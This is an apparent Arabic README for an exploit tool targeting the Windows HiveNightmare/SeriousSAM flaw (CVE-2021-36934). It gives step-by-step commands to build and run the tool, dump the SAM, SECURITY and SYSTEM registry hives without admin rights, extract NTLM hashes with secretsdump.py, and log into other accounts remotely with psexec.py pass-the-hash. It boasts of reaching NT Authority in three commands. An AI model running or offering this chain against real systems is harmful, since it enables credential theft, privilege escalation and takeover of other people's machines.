
استغلال لـ CVE-2021-36934
أداة استغلال لثغرة HiveNightmare/SeriousSAM تسمح لك بقراءة خلايا التسجيل (registry hives) التي تحتوي على بيانات حساسة دون صلاحيات المسؤول. إذا كان هذا لا يبدو كتصعيد للصلاحيات، فلا أدري ما هو.
بعد بناء الأداة باستخدام cargo build واسترجاع الملف التنفيذي، قم بنشرها في بيئة الاختبار الخاصة بك، افتح CMD ونفذ .\oxide_hive [max shadow copies]، العدد الافتراضي للنسخ الظلية (shadow copies) هو 15. سيتم تفريغ خلايا SAM و SECURITY و SYSTEM إلى دليل العمل.
بعد ذلك يمكنك استخدام هذا السكريبت مع الأمر secretsdump.py -sam SAM.dump -security SECURITY.dump -system SYSTEM.dump local لاسترجاع تجزئات NTLM.
ثم يمكنك استخدام سكريبت آخر مع الأمر psexec.py -hashes <account's hash> <user>@<machine's ip> cmd.exe لتسجيل الدخول عن بُعد إلى أي حساب. مبروك، لقد انتقلت من مستخدم غير متميز إلى سلطة NT Authority بثلاثة أوامر فقط.